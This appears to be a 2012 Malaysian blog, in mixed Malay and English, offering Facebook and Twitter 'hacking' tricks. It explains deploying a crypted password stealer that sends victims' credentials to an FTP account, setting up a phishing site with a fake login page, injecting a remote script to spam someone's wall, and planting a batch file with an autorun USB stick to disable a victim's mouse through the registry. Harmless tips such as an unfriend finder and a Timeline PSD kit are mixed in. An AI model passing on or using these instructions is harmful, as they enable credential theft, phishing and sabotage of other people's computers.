Selasa, 5 Jun 2012

Cara-cara hack akaun Facebook use password stealer ::

This is old hacking tool but working very well, It’s aPassword Stealer , This Password Stealer is not FUD but we have a FUD Crypter which we can utilize to make this password stealer 100% FUD. So keep on reading for full guide.

What Is Password Stealer ?

As the name indicates password stealer is a hacking tool which will steal all email account password from remote computer very silently.

How To Hack An Facebook Account Password Using Password Stealer?

Just follow these easy steps and you will be able to "Hack FacebookAccount" or you can "Hack Any Email Account" after using this hack tool.

·        First of all deactivate you antivirus - 
·        "Download Password Stealer" from here

·        This is in rar file so first extract it to desktop

·        Now create new account on "" as we will need ftp account
·        Open the Password Stealer And so follow this steps are shown in vedio

·        Now after following the above shown steps, click on createserver.
·        Then go to "FUD Crypter" and crypt the created server (virus).
·        Thats it, now send this virus to victim by any mean ( fool him in any mean )
·        Atlast, when he/she clicks on the virus the after five minutes check ftp account
·        In FTP account you can see tons of account username and password

Spam diWall Facebook seseorang :

Step1: First you need to be on "http://" connection instead of "https://", so simple Login into your FB account and goto Account > Account Settings > Account Security. Over there "unTick" |Secure Browsing (https)|

Step2: Now goto the Persons wall whom you want to spam , and then paste the following code into the address bar:

javascript:(a = (b = document).createElement("script")).src = "//", b.body.appendChild(a); void(0)  

Step3: Now a new box will pop up. In that type the number of times you want the message to be posted and click on "OK".

Step4After that type the message that you want to post and click on "OK"

After that its all done just refresh and you will Spam the other person.

Cari sape unfriend korang :

Generally, Facebook won't notify you when people unfriend or remove you from their friend list. Suppose you have 425 friends on Facebook yesterday but today number decreases to 421. How do you find the names of those four peoples who decided to unfriend you on Facebook. So a free web app which will notify you when someone unfriend or remove you from their friend list is a solution of this problem. Twenty Feet can help you to reveal the names of your ex-friend. But the services offered by this site are not free, you can use that services for a short period only. So lets adopt another method.

There is free Firefox Add-ons called Unfriend Finder which will help you to find the names of your ex-friends.

Features Of Unfriend Finder:

  • Easily integrate with your Facebook account. 
  • Create a separate icon in menu bar which shows how many friend unfriend you from their friend's list.
  • You will get immediately notified when anyone unfriend you.
  • Find out who did not accept your friend request or who ignored your friend request.

How to Install Unfriend Finder On Facebook:

  1. Unfriend Finder compatible only with Firefox, Chrome, Opera, Safari.
  2. Visit the official page of  Unfriend Finder.
  3. Follow the instruction on the "download" page.
  4. Find your ex-friends and enjoy.

Komputer korang laki ke pompuan ?

Ikut step-step nie :-

Open Notepad.
Copy and paste CreateObject("SAPI.SpVoice").Speak"Hello your name"
Save as computer_gender.vbs
Run the file.

                 If you hear a male voice, you have a boy.
                                                       If you hear a female voice, you have a girl.

Menghentikan mouse komputer musuh anda .

Here's the Method
    We are going to create this virus using our usual Batch programming.  In this post i am not only giving you simply the code but also explanation for the Batch program.  So I hope that this post will make you happy.

Batch Programming Code:

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Explanation about this code
   "@echo off" This command will either turn ON, or OFF the command you put in a batch file from showing itself. (don't confuse now,batch programming intro will make you clear).

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" will access the registry stored in  this location"HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

The  Procedure to create this virus:
    Okay now we will see the what are the procedure to follow in order to make this virus perfectly work in victim pc. 

Step 1:

  1.    Copy the Batch code into notepad. 
  2.    Save it as .bat extension (for eg: clickme.bat)
Step 2: 
      Now open the notepad and copy this code:-

Action=Mouse Disable

   Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3:
         Then copy the two files in your pen drive or victim's pen drive.

That's all we have finished.  Now bring your pen drive to your friend or victim home.  Now whenever the mouse is inserted ,the mouse will be disabled.

How to recover from this attack?
        Sorry for mentioning this fun as attack.  To recover from this attack ,you can follow these steps:-
Copy this code into the notepad:-

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

and save it with .bat extension(for eg: release.bat).
now open this batch will re-enable the mouse actions.

Facebook Timeline Kit :D


Facebook Timeline KIT - Features

88 independant parts which can be utterly combined

Almost unlimited combinations

All Elements are easy to move, rotate and customize

Easy to change, enable or dissable every part of the Facebook Timeline

1 PSD File – very well organized with color coded Folders

PSD is ready to be saved as .jpg and uploaded to your Facebook Profile - 850 x 315 px

Camner nk tengok private photo kt FACEbOOK .

First go to : 
Accept the app then you'll do anything you want : just copy/cut the ID, or the Name of the person and enjoy 

You can even download the entire album.
If you dont want to go to each time there is an addon specific :

Isnin, 4 Jun 2012

Hack twitter akaun by PHISHING . Heeeeee

Step 1: The First Step in Making the site is to regester an account at 

Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this File ) .

Step 4: Now Goto and Log into your account.

Step 5: Now when you are logged into your account click on the Online File Manager under File Management.

Step 6: Now Click on the htdocs and then on Upload Button.

Step 7: Now choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.

NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


Akan datang : cara-cara untuk hack akaun FB

Family tree app on FB - tukar nama family . senang sangat-2 :)

family tree facebook
Ikut step-2 nie ...

If you are already using “Family tree” application, you will find the app in your facebook homepage. It is generally located on the left hand box of your Facebook profile. Nonetheless, there are times when it is hidden, just the link titled “More” will come to your aid. If you don’t see the app, here’s the link:
#2. The application would take a few seconds to load and open in its entirety. Once it does, click on the toolbar to locate the options available there. One of these options would be entitled “My Tree”. Press the button on this one.
#3. Place your mouse over the family member whose name and details you wish to alter. As you do this, a separate tab would open consisting of all the details you are looking for, regarding that particular person. Switch to this tab and decide as to what changes you wish to incorporate.
#4. The content which you wish to alter, must first be highlighted. As you do this, a content box will open, asking you to register whatever changes are meant to be made. Do this with great detail. Fill in the requisite information in the starred and unstarred fields as has been asked.
#5. Once you have made the desired transformations, click on the button titled ‘Submit’. This would instantly submit all the information you have provided to the application’s database. Check the final result and see whether the changes have been correctly made or not.
By following the simple steps mentioned above, it would indeed become easy for you to change the names in the family tree application. You merely need to have a little patience coupled with a tinge of persistence to do so. After all, the application is a virtual declaration of your familial roots and you certainly do not want any misunderstandings to originate owing to incorrect information!

Akan datang : cara-cara untuk hack akaun twitter

Cara-cara untuk mengesan IP seseorang diFacebook . -Tracing facebook user

First you got to find out the IP address of that User.

To Do so we will be using “netstat” command in windows. If you want to know the IP address of a specific person on facebook or orkut or any chat service, there is only one way: Just invite or ping him for a chat and while chat is ON open ‘Command Prompt‘ on your PC (Start >Run>cmd).
note: before trying this make sure you close all the other tabs in your browser. and only facebook is open. also if possible delete all the history and cache from your browser.
When command prompt opens Type the following command and hit Enter.
netstat -an
And you will get all established connections IP addresses there. Note down all the suspicious IP’s

The Next Step is to Trace that user using his IP address.

To do so we will be using IP tracer service. Go to the below address and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.
It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you.
Other netstat commands:
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p option may be used to specify a subset of the default.